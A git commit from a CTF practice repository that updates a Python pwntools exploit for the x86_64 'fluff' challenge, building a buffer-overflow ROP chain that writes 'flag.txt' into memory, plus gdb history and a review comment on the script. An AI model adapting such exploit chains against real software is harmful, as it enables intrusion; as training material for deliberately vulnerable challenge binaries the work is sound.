author | Brett Weiland <techcrazybsw@gmail.com> | 2020-12-18 01:42:14 -0600 |
---|---|---|
committer | Brett Weiland <techcrazybsw@gmail.com> | 2020-12-18 01:42:14 -0600 |
commit | 406768c5fead9fcadc9dc466da4286e5ac3c7274 (patch) | |
tree | 6d546250c6dbb09b49223f0139d4ef63defc7269 /x86_64/fluff | |
parent | 4c25bd918847e914875e900285008eb3865ca8b6 (diff) |
deleted: x86_64/badchars/core
modified: x86_64/fluff/.gdb_history
deleted: x86_64/fluff/core
modified: x86_64/fluff/exploit.py
deleted: x86_64/ret2win/core
deleted: x86_64/split/core
deleted: x86_64/write4/core
Diffstat (limited to 'x86_64/fluff')
-rw-r--r-- | x86_64/fluff/.gdb_history | 47 | ||||
-rw-r--r-- | x86_64/fluff/core | bin | 4292608 -> 0 bytes | |||
-rwxr-xr-x | x86_64/fluff/exploit.py | 30 |
3 files changed, 46 insertions, 31 deletions
diff --git a/x86_64/fluff/.gdb_history b/x86_64/fluff/.gdb_history
index cfa1057..0d0b7f2 100644
--- a/x86_64/fluff/.gdb_history
+++ b/x86_64/fluff/.gdb_history
@@ -1,19 +1,4 @@
 quit
-quit
-continue
-nexti
-nexti
-info reg rdi
-stepi
-nexti
-info reg rcx
-nexti
-info reg rbx
-stepi
-info reg rdx
-inro reg rbx
-info reg rbx
-quit
 stepi
 continue
 stepi
@@ -237,3 +222,35 @@ x/x 0x601be0 + 8
 x/x 0x601be0 + 9
 x/x 0x601be0 + 10
 quit
+continue
+context
+x/x 0x7fff0b74fed0
+x/100x 0x7fff0b74fed0
+quit
+break *0x400639
+continue
+context
+continue
+x/s 0x601be0
+continue
+x/s 0x601be0
+stepi
+stepi
+x/s 0x601be0
+quit
+continue
+continue
+quit
+break *0x00000000004006a3
+continue
+continue
+quit
+break pwnme
+run
+continue
+break *0x00000000004006a3
+continue
+info reg rip
+continue
+info reg rip
+quit
diff --git a/x86_64/fluff/core b/x86_64/fluff/core
Binary files differ
deleted file mode 100644
index ae36a67..0000000
--- a/x86_64/fluff/core
+++ /dev/null
diff --git a/x86_64/fluff/exploit.py b/x86_64/fluff/exploit.py
index cdf5de8..2b520d8 100755
--- a/x86_64/fluff/exploit.py
+++ b/x86_64/fluff/exploit.py
@@ -13,37 +13,35 @@ letter_lookups = { def write_str(dest, string, payload): payload += p64(0x00000000004006a3) payload += p64(dest) - for c in string: - payload += p64(0x40062a) - payload += p64(0x4000) # if things go wrong, check endian/order + payload += p64(0x0000000000400610) + payload += p64(1) + payload += p64(0x40062a) + payload += p64(0x4000) + payload += p64(letter_lookups[string[0]] - 0x3ef2) + payload += p64(0x400628) + payload += p64(0x400639) + + + for c in string[1:]: + payload += p64(0x40062b) payload += p64(letter_lookups[c] - 0x3ef2) - payload += p64(0x0000000000400610) - payload += p64(0) - + payload += p64(1) payload += p64(0x400628) - payload += p64(0x400639) return(payload) -prog = gdb.debug('./fluff', gdbscript=''' -break *pwnme + 151 -''' -) +prog = process('./fluff') payload = b'' for c in range(40): payload += b'a' payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload) payload += p64(0x00000000004006a3) -payload += p64(0x601be0) # set rdi - +payload += p64(0x601be0) payload += p64(0x0000000000400510) -payload += b"\n" prog.sendline(payload) -sleep(1) -print(str(prog.recv(), 'UTF-8')) prog.interactive() |
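Review bot: The write destination is spelled two different ways in the new chain — `write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)` and, a few lines later, the bare `payload += p64(0x601be0)` placed after 0x4006a3 ahead of the final 0x400510 entry — and with the old `# set rdi` comment gone nothing ties them together, so editing one silently desynchronises the address handed to the final call from the one the string was written to. Define it once, `SCRATCH = 0x601be0  # writable target that receives 'flag.txt'`, and use it in both places; likewise give the bare gadget addresses (0x4006a3, 0x400610, 0x40062a/0x40062b, 0x400628, 0x400639, 0x400510) named module constants with a one-line comment each, since this hunk drops the only two comments the chain had. In particular the purpose of the `p64(1)` that follows 0x400610 for the first character, and of the `p64(1)` emitted inside the `string[1:]` loop, is not visible from the script and needs a comment. `write_str` also assumes a non-empty `string` (`string[0]`) and that every character is a key of `letter_lookups`, which is defined above this hunk; acceptable for a CTF script, but worth stating in a docstring. Minor: `payload += b'a' * 40` replaces the `for c in range(40)` loop and `return payload` the `return(payload)`.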